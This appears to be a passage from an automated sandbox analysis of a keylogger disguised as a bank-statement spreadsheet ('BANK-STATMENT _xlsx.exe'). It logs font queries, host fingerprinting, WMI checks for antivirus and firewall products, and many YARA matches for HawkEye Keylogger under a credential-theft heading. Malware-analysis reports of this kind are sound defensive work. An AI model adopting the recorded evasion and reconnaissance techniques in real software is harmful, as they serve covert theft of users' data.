                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0046A9D0 GetSystemTime,ExitProcess,0_2_0046A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,6_2_0040724C
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00440BF4 GetVersion,0_2_00440BF4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.665351637.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000002.00000002.781407102.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.786924724.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000010.00000002.810314867.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.822009123.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000017.00000002.864676132.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.868823721.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000001F.00000002.891689573.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.894914378.000000000019D000.00000004.00000010.sdmpBinary or memory string: avp.exe
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.774857470.0000000006760000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.798729439.00000000008DA000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912205260.000000000077B000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.798860254.000000000097E000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmpBinary or memory string: Defender\MsMpeng.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912269653.00000000007FB000.00000004.00000020.sdmpBinary or memory string: Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                Stealing of Sensitive Information:

                barindex
                Yara detected HawkEye KeyloggerShow sources
                Source: Yara matchFile source: 00000022.00000002.915921004.0000000003032000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.803619602.0000000002F08000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.915989570.0000000003038000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.885749429.0000000002F48000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.803587831.0000000002F02000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.885702309.0000000002F42000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.932841604.0000000002F34000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.911923188.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.932871258.0000000002F3A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5580, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 6984, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1548, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1496, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5540, type: MEMORY
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
